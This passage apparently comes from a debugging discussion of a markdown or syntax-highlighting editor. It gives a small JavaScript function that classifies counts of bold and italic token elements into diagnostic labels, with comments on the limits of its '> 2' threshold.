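// outside the browser. interpretCounts and its three result labels are
// hypothetical; the thresholds mirror the strong.length > 2 heuristic.

```javascript
// Maps the .tok-strong / .tok-emphasis element counts to a verdict.
function interpretCounts(strongCount, emphCount) {
  if (strongCount === 0 && emphCount === 0) return 'no-nodes'          // grammar issue
  if (strongCount > 2 || emphCount > 2) return 'styled-content'         // likely a font issue
  return 'delimiters-only'                                              // body nodes missing
}

console.log(interpretCounts(0, 0))
console.log(interpretCounts(3, 0))
console.log(interpretCounts(2, 2))
```

// Note that the "> 2" heuristic assumes a single bold and a single italic run
// in the document; with several runs, delimiter spans alone can exceed two.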